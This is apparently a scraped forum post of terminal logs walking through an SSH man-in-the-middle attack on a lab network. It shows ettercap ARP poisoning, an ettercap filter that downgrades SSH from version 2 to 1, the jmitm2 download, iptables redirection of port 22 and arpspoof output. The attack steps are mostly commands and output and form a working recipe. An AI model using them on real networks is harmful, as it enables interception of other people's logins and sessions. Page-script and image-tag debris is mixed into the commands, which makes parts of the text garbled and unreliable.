1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | root@Dis9Team:~# ettercap -T -M arp // // -q -i eth5 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on eth5... (Ethernet) eth5 -> 08:00:00:00:00:03 5.5.5.3 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 2 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help |
1 2 3 4 5 6 7 | <pre>brk $ ssh 5.5.5.6 -p 2222 -1 brk@5.5.5.6<SCRIPT type=text/javascript> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </SCRIPT>'s password: Last login: Sat Nov 17 19:30:29 2012 from 5.5.5.1 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | <pre>root@Dis9Team:/usr/share/ettercap# cat etter.filter.ssh ############################################################################ # # # ettercap -- etter.filter -- filter source file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ## # # This filter will substitute the SSH server response from SSH-1.99 to # SSH-1.51, so if the server supports both ssh1 and ssh2 we will force # it to use ssh1... <IMG class=wp-smiley alt=;) src=http://www.2cto.com/uploadfile/2012/1219/20121219105154693.gif" height=auto jQuery172042555347942556737="28" old_width="24" old_height="24"> # server response : SSH-2.00 only ssh2 supported # SSH-1.99 both ssh1 and ssh2 supported # SSH-1.51 only ssh1 supported ## if (ip.proto == TCP) { if (tcp.src == 22) { if ( replace("SSH-1.99", "SSH-1.51") ) { msg("[SSH Filter] SSH downgraded from version 2 to 1\n"); } else { if ( search(DATA.data, "SSH-2.00") ) { msg("[SSH Filter] Server supports only SSH version 2\n"); } else { if ( search(DATA.data, "SSH-1.51") ) { msg("[SSH Filter] Server already supports only version 1\n"); } } } } } root@Dis9Team:/usr/share/ettercap# |
1 2 3 4 | <pre>brk $ nc -vv 5.5.5.6 22 Connection to 5.5.5.6 22 port [tcp/ssh] succeeded! SSH-2.0-OpenSSH_4.6 |
1 2 3 4 5 | <pre>root@Dis9Team:/pen# wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz root@Dis9Team:/pen# tar xf jmitm2-0.1.0.tar.gz root@Dis9Team:/pen# cd jmitm2-0.1.0/ root@Dis9Team:/pen/jmitm2-0.1.0# |
1 2 | <pre>root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/conf/server.xml |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | <pre>root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT root@Dis9Team:~# iptables -A FORWARD -j ACCEPT root@Dis9Team:~# arpspoof -i eth5 -t 5.5.5.6 5.5.5.0 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that a host key has just been changed. The fingerprint for the DSA key sent by the remote host is dc:77:1e:b0:1b:a1:7c:71:33:1f:75:32:fe:e5:2e:28. Please contact your system administrator. Add correct host key in /home/brk/.ssh/known_hosts to get rid of this message. Offending DSA key in /home/brk/.ssh/known_hosts:57 remove with: ssh-keygen -f "/home/brk/.ssh/known_hosts" -R 5.5.5.6 DSA host key for 5.5.5.6 has changed and you have requested strict checking. Host key verification failed. brk $ |
歡迎光臨 灰鴿子遠(yuǎn)程控制軟件 (http://www.dumiaotech.com/) | Powered by Discuz! X3.4 |